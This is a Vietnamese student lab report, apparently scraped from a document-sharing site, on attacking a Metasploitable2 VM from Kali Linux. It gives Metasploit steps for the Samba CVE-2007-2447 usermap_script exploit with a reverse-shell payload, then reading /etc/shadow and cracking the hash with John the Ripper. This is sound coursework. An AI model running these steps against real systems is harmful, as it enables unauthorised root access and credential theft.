BÁO cáo bài THỰC HÀNH số 1 AN TOÀN hệ điều HÀNH luyện thực hành tấn công kiểm soát hệ thống chạy ubuntu từ xa sử dụng công cụ tấn công metasploit trên kali linux 1

14 103 0
BÁO cáo bài THỰC HÀNH số 1 AN TOÀN hệ điều HÀNH luyện thực hành tấn công kiểm soát hệ thống chạy ubuntu từ xa sử dụng công cụ tấn công metasploit trên kali linux  1

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THƠNG TIN AN TỒN HỆ ĐIỀU HÀNH BÁO CÁO BÀI THỰC HÀNH SỐ Giảng viên:Hoàng Xuân Dậu Họ tên : Nguyễn Minh Thành Mã sinh viên: B19DCAT177 Hà Nội – 2022 Page| An toàn HĐH (INT1484) - Bài thực hành số 1.Mục đích: - Tìm hiểu lỗ hổng số dịch vụ, phần mềm HĐH - Luyện thực hành công kiểm sốt hệ thống chạy Ubuntu từ xa sử dụng cơng cụ cơng Metasploit Kali Linux Tìm hiểu lỗ hổng bảo mật số DV Ubuntu Metasploitable2 máy ảo VMWare tích hợp nhiều dịch vụ chứa lỗi bảo mật biết cho phép khai thác kiểm soát hệ thống từ xa phục vụ học tập Danh sách lỗ hổng hướng dẫn khai thác tìm tại: https://www.hackingarticles.in/comprehensive-guide-on-metasploitable-2/ Lỗ hổng lỗ hổng bảo mật CVE-2007-2447 dịch vụ chia sẻ file SMB (Samba) với phiên Samba 3.0.0 đến 3.0.25rc3 cho phép thực thi mã từ xa Chi tiết lỗ hổng tìm tại: https://nvd.nist.gov/vuln/detail/CVE2007-2447 Nội dung thực hành 3.1 Cài đặt công cụ, tảng +Cài đặt máy ảo Metaploittable2 Kali linux o Kiểm tra chạy thử công cụ công MetaSploit Sử dụng máy ảo cài đặt đổi tên cài sẵn từ trước - Tạo người dùng máy 3.2 Quét máy victim Metasploitable2 tìm lỗ hổng tồn - Tìm địa IP máy victim, kali: o Chạy lệnh cửa sổ terminal: ifconfig eth0 o Tìm IP v4 interface eth0 mục ‘inet addr’ - Kiểm tra kết nối mạng máy: - o Từ máy victim, chạy lệnh ping o Từ máy Kali, chạy lệnh ping Sử dụng công cụ nmap để rà quét lỗ hổng tồn máy chạy Metasploitable2: o Quét cổng dịch vụ netbios-ssn cổng 139: nmap script vuln - p139 o Quét cổng dịch vụ microsoft-ds cổng 445: nmap script vuln -p445 3.3 Khai thác tìm phiên Samba hoạt động: - Khởi động Metasploit - Khai báo sử dụng mô đun công: msf > use auxiliary/scanner/smb/smb_version - Đặt địa IP máy victim: msf > set RHOST Tấn công : - - msf>run ➔ Máy victim liệt kê tên dịch vụ Samba phiên -> khoanh đỏ thông tin phiên Samba - Gõ lệnh exit để kết thúc - 3.4 Khai thác lỗi Samba cho phép mở shell chạy với quyền root: - Khởi động Metasploit - Khai báo sử dụng mô đun công: msf > use exploit/multi/samba/usermap_script - Chạy lệnh “show options” để xem thông tin mô đun công sử dụng - Đặt địa IP máy victim: msf > set RHOST - Đặt 445 cổng truy cập máy victim: msf > set RPORT 445 - Chạy lệnh “show options” để xem thông tin thiết lập công sử dụng - Chọn payload cho thực thi (mở shell): msf > set payload cmd/unix/reverse - Thực thi công: msf > exploit - ➔ Cửa hậu mở shell với người dùng root cho phép chạy lệnh từ máy Kali ➔ thực lệnh shell máy victim Chạy lệnh để đọc tên người dùng máy truy cập: whoami uname -a - Lấy tên người dùng mật tạo mục 3.1: cat /etc/shadow | grep thanhnm177 , thanhnm177 tên người dùng tạo - Chọn chép dòng tên người dùng mật băm vào clipboard - Mở cửa sổ Terminal mới, chạy lệnh: nano password sau paste thông tin tên người dùng mật băm từ clipboard vào file password Gõ Ctrl-x để lưu vào file - Crack để lấy mật sử dụng chương trình john the ripper (hoặc cơng cụ crack mật khác): john show password Chụp hình chép kết crack mật - Gõ Ctrl-c để kết thúc Yêu cầu cần đạt Thành thạo cài đặt chạy máy ảo Ubuntu Thành thạo sử dụng Metasploit để công khai thác lỗ hổng sử dụng thư viện có sẵn Chụp ảnh hình kết lưu vào file (hoặc giữ nguyên cửa sổ hình thực hiện): c a Màn hình quét lỗ hổng b Màn hình phiên Samba Màn hình sau công thành công chạy lệnh whoami uname -a hệ thống victim (tên máy đặt lại theo yêu cầu); d Màn hình chạy lệnh cat trích xuất tên mật người dùng e Màn hình crack mật .. .An toàn HĐH (INT1484) - Bài thực hành số 1. Mục đích: - Tìm hiểu lỗ hổng số dịch vụ, phần mềm HĐH - Luyện thực hành cơng kiểm sốt hệ thống chạy Ubuntu từ xa sử dụng công cụ công Metasploit Kali. .. https://nvd.nist.gov/vuln/detail/CVE2007-2447 Nội dung thực hành 3 .1 Cài đặt công cụ, tảng +Cài đặt máy ảo Metaploittable2 Kali linux o Kiểm tra chạy thử công cụ công MetaSploit Sử dụng máy ảo cài đặt đổi tên cài sẵn từ trước - Tạo... victim, chạy lệnh ping o Từ máy Kali, chạy lệnh ping Sử dụng công cụ nmap để rà quét lỗ hổng tồn máy chạy Metasploitable2: o Quét cổng dịch vụ netbios-ssn cổng 13 9:

Ngày đăng: 02/04/2022, 14:37

Từ khóa liên quan

Tài liệu cùng người dùng

Tài liệu liên quan